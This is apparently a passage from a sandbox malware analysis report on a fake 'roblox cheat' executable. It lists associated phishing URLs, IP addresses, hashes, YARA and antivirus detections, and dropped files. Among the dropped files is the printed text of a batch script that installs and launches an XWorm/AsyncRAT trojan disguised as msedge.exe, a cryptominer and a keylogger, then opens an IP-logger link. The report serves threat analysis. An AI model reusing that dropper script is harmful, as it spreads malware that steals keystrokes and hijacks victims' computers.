                                                                                                http://pub-5ef76d7c843349bb9d3d1a0a081c814c.r2.dev/bea40.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 3.70.101.28
                                                                                                https://logn-sso-ttrezor.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                • 108.156.61.158
                                                                                                http://pub-1319180bb90248deb7023e5f86025f65.r2.dev/zane.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 3.70.101.28
                                                                                                http://stonemanwell147.wixsite.com/myd0czGet hashmaliciousUnknownBrowse
                                                                                                • 108.156.60.6
                                                                                                https://orr.swq.mybluehost.me/ch/f6014/Get hashmaliciousUnknownBrowse
                                                                                                • 52.213.34.131
                                                                                                https://orr.swq.mybluehost.me/ch/Get hashmaliciousUnknownBrowse
                                                                                                • 3.71.149.231
                                                                                                https://fpsadv.com/n1/NedbankMoney.htmGet hashmaliciousUnknownBrowse
                                                                                                • 18.245.60.69
                                                                                                ROBLOX-PRODUCTIONUSRoblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.123.3
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.123.4
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.123.4
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.127.3
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.119.4
                                                                                                RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                                                • 128.116.21.4
                                                                                                SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.4
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.4
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.3
                                                                                                SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                                                                • 128.116.123.3
                                                                                                CLOUDFLARENETUShttp://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                • 188.114.97.3
                                                                                                http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.25.14
                                                                                                http://s.id/helpcenter84619Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 188.114.96.3
                                                                                                http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                • 172.64.147.209
                                                                                                http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.3.35
                                                                                                http://pub-150673a82d0042c3be06302794553f66.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.17.25.14
                                                                                                http://connectinmate.org/@@@/cancelss/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.18.11.207
                                                                                                http://mentmiasklogione.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                • 172.64.147.209
                                                                                                file.exeGet hashmaliciousLummaC, DanaBot, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                                • 188.114.97.3
                                                                                                http://pub-5ef76d7c843349bb9d3d1a0a081c814c.r2.dev/bea40.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.2.35

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                28a2c9bd18a11de089ef85a160da29e4https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                https://nadiperformance-f5135f.ingress-earth.ewp.live/wp-content/plugins/kredittikay%C4%B1l/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://www.kjecom.com/serviciodecorreo/login/Get hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://s.id/helpcenter84619Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://pub-150673a82d0042c3be06302794553f66.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://connectinmate.org/@@@/cancelss/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\roblox cheat.exe.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):522
                                                                                                Entropy (8bit):5.358731107079437
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                                MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                                SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                                SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                                SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                                Malicious:true
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                C:\Users\user\AppData\Local\Roblox\logs\cacert.pem

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):233235
                                                                                                Entropy (8bit):6.025218023713329
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:OhGvwW6Jj7ITWYv0yoVH283rz9WqIAsjjg4DsUQS88UP4TFf3xVOVkCC554jMN/C:M5W+j8chWf8xyvp5iIzB4CNxza/MK
                                                                                                MD5:0194EB945475F93844C0FAE769C0FA0B
                                                                                                SHA1:D72876A801C702348EA5B4B4A333C484F2A721FD
                                                                                                SHA-256:A6BC06B8255E4AFE2EEFF34684605D04DF9EC246FC201BF5E44137987189A0D3
                                                                                                SHA-512:72A00FE6B9111CAB22F1F424F815A617BE2041A3857A6265B004CA1BFD10F345CA33369CD43009B483F9436CCBCD69C70F7033A85D94527B1F39846B75B43C17
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Mon Mar 11 15:25:27 2024 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.29...## SHA256: 4d96bd539f4719e9ace493757afbe4a23ee8579de1c97fbebc50bba3c12e8c1e..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk

                                                                                                C:\Users\user\AppData\Local\Roblox\logs\robloxPX1instaler_DD2F4.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3798
                                                                                                Entropy (8bit):5.354285454779853
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Dqe/AZdvxDSGikir0rZv/HZgZ6ubZgZ6ub2gZ6ubhKLYZJ9K4z/SY5Jy59ZggJIt:m88/8C8yRZrvGlJMJ1JX0J2OwV7JRd/
                                                                                                MD5:F23292F5592198D1091ED092497F6A9C
                                                                                                SHA1:146EF8C465B6DE3F7AC6248C3A3C88C26CF07DBE
                                                                                                SHA-256:4A9E623032DA405BF7EB876C4DE377AC0054B85FA33800784D0AE61A269D4223
                                                                                                SHA-512:98F601B5681D28BE289C76AE5C9201E7F012E2407D4806BAA82A57C9227FEE805AA2EB1633873988909D1B631451FE5724B42515A613BE9254E1D95B480FC109
                                                                                                Malicious:false
                                                                                                Preview:2024-07-29T22:46:05.969Z..2024-07-29T22:46:05.025Z,0.025997,0f44,6,Info [FLog::DesktopInstaller] The installer reporter is initialized..2024-07-29T22:46:05.026Z,0.026046,0f44,6,Info [FLog::DesktopInstaller] Reporting Installer Start..2024-07-29T22:46:06.079Z,1.079255,07f0,6,Info [FLog::DesktopInstaller] Start the Installer thread..2024-07-29T22:46:06.122Z,1.122533,07f0,6,Info [FLog::DesktopInstaller] The installer will run InstallNormal..2024-07-29T22:46:06.122Z,1.122612,07f0,6,Info [FLog::DesktopInstaller] Fetch flag info..2024-07-29T22:46:06.929Z,1.929084,0588,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, body: ..2024-07-29T22:46:11.868Z,6.868474,0588,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, bo

                                                                                                C:\Users\user\AppData\Local\Temp\ msedge.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):166912
                                                                                                Entropy (8bit):6.251413929646261
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:TmnOFd9UhOMQRUGKXs+S++7KFSbxeY+qDDrMK:3d9YGqStKEbxI
                                                                                                MD5:D653AEF66E218FB009B43365919BBCE3
                                                                                                SHA1:D38CAFCD950B901EE79FF72EBB87FEC8B2D9582A
                                                                                                SHA-256:E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
                                                                                                SHA-512:FF4776B44ACD815251908B7D726980FA9DE5E02AED32026C5A72B64A7B0A464399BE730EE37473FDE3406AE7D7D43284018ADE4D32FC160F579764344DA06EF6
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: Joe Security
                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: ditekSHen
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................@.....................................S.......L............................................................................ ............... ..H............text....... ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........U...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):140288
                                                                                                Entropy (8bit):5.566968845764678
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:6mnOFd9U8OM+fe295liNgTddwY0JwsR4TbswYqkX5bEdGDOjESHhddJWjjY/ffIo:Wd9UH95D
                                                                                                MD5:3AFF3B824FC5BCD05EF4D8EEE176E443
                                                                                                SHA1:422883493E21D605CB47CC08FD48CAEAD73F414C
                                                                                                SHA-256:79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
                                                                                                SHA-512:126818953B72233B2B0C50523ACE1EA8D1004F80EEDD0414A4FD3E4E385A3CB1D29E3D9BF7B50FA28AE5CC8EF2BF543D6416531F05FB977A79E60E51A82B03AE
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: Joe Security
                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: ditekSHen
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................@.....................................S.......<....................`....................................................... ............... ..H............text....... ...................... ..`.rsrc...<...........................@..@.reloc.......`......."..............@..B........................H........U...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                C:\Users\user\AppData\Local\Temp\Keyloger.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):168960
                                                                                                Entropy (8bit):5.30703099621005
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:PV8w386j+bSL1OGtLJBz65/M6If+3Js+3JFkKeTnY:PN6bsrxBt25
                                                                                                MD5:520E97797B27B752130B3E982953CEAF
                                                                                                SHA1:AB460DA7E69D43747D98A4F45F5BB09D0E971789
                                                                                                SHA-256:8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
                                                                                                SHA-512:3219E4FE6B23411B48930FCE21DA24C8CE9BB07C6B069FA38B26B32DCC102C668F32AE816BD526CFBB44480F8279586509EBB11E9B75138A1F59AE771AA53664
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: Joe Security
                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: ditekSHen
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 82%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?[.f............................."... ...@....@.. ....................................@.................................X"..S....@..Z............................................................................ ............... ..H............text........ ...................... ..`.rsrc...Z....@......................@..@.reloc..............................@..B................."......H........]..........&.....................................................(....*.r...p*. .x!.*..(....*.rc..p*. !...*.s.........s.........s.........s.........*.r...p*. .&..*.r'..p*. ~.H.*.r...p*. .(T.*.r...p*. ..$.*.rM..p*. C.?.*..((...*.r_..p*. [...*.r...p*. .A..*"(....+.*&(....&+.*.+5sR... .... .'..oS...(,...~....-.(G...(9...~....oT...&.-.*.r%..p*. S...*.ri..p*. ....*.r...p*.r...p*. ....*.r5..p*. *p{.*.ry..p*. ...*..............j..................sU..............*"(I...+.*:

                                                                                                C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):630062
                                                                                                Entropy (8bit):7.130280084277062
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:yyveQB/fTHIGaPkKEYzURNAwbAgOT+t1/l36KUU0TetYsO3IB/m+:yuDXTIGaPhEYzUzA0bZB0gOY9z
                                                                                                MD5:FC411F4D9F4DBA5104CB1549153A8684
                                                                                                SHA1:A4591F154FBC922A8409A1C010DF6706F69A95E8
                                                                                                SHA-256:28A6ACCC3134DDD287CA1C37D2C136C39255EF1654475F1E4DBC511F9D0EA35D
                                                                                                SHA-512:000681D2C7A1AFA4BAA5470F6C46349B021C88F3D070BCEACBF0F2B6A6BAC6FF3F1E4F31729DB619C8E455FDF3B810662E24C446DC76F73E5C0DAD2DD6536C0B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...j.................@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\coin.bat

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):517
                                                                                                Entropy (8bit):5.103767602316603
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Z0DtzHGtzs22yZOVqZwGJbShOVqZwGJbKy5intuAfhH0HR:ZMz0zsBiO4Z+O4ZOKuPfQR
                                                                                                MD5:DE26F0FF06A38A22766F3978775B13BD
                                                                                                SHA1:A845EBED70BF63BD700B0AFF5418ECA6CC9177ED
                                                                                                SHA-256:8902A3F7733E13FDA8183E490550D22C8711CF30B5661CB554579C1F47A0609A
                                                                                                SHA-512:8EEE58C2312F3488EE86F50E84CB854189254753A265B7E52C564ECA5A3C0836CD059B9540DADD531EED948AEBC1F88D4B7D466780FEB8C39F7E56DDC89D22B1
                                                                                                Malicious:false
                                                                                                Preview:%echo off..copy %temp%\msedge.exe %systemDrive%\Program Files (x86)\Microsoft\Edge\Application..start %systemDrive%\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..copy %temp%\BitCoin_miner.exe %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6..start %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6\BitCoin_miner..copy %temp%\Keyloger.exe %systemDrive%\Program Files (x86)..start %systemDrive%\Program Files (x86)\Keyloger.exe..start cmd..start https://2no.co/24RXx6

                                                                                                C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):5720984
                                                                                                Entropy (8bit):6.362394353465928
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:v7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuq7:70cB3djgmggDaRXAtHB
                                                                                                MD5:27469372591B14FF1C57654FACB5E020
                                                                                                SHA1:492C166CD0E6C8D122CA4687659BF047CD48AFD7
                                                                                                SHA-256:3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
                                                                                                SHA-512:0CFA845DE57ACF6F17F295F0771C2A61CD846EFDEE79DA012DEF474BCAA91D9E99D3D528CF5698E6112A310C4F97E98AE74B6CFC601B2988C51E92270EBF92A2
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..................M.....M...P.....9.......................9...M.....+.....M.....T............M.......O...T...(...T.;...S...T.....Rich....................PE..L................"......b4......... (/.......4...@..........................`......`/X...@.................................D.B.T....0..............."W..)......<[....@.p.....................@.......@.@.............4.<............................text...v`4......b4................. ..`.rdata..Rs....4..t...f4.............@..@.data....+....C..*....B.............@....rsrc........0........O.............@..@.reloc..<[.......\....T.............@..B................................................................................................................................................................................................................................................

                                                                                                Chrome Cache Entry: 60

                                                                                                Download File
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.051559084988302
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                                Malicious:false
                                                                                                Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;

                                                                                                Chrome Cache Entry: 61

                                                                                                Download File
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):2833
                                                                                                Entropy (8bit):7.876846206921263
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                Malicious:false
                                                                                                URL:https://cdn.iplogger.org/favicon.ico
                                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                                Chrome Cache Entry: 62

                                                                                                Download File
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                                Category:downloaded
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.051559084988302
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                                Malicious:false
                                                                                                URL:https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396
                                                                                                Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;

                                                                                                Chrome Cache Entry: 63

                                                                                                Download File
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):2833
                                                                                                Entropy (8bit):7.876846206921263
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                Malicious:false
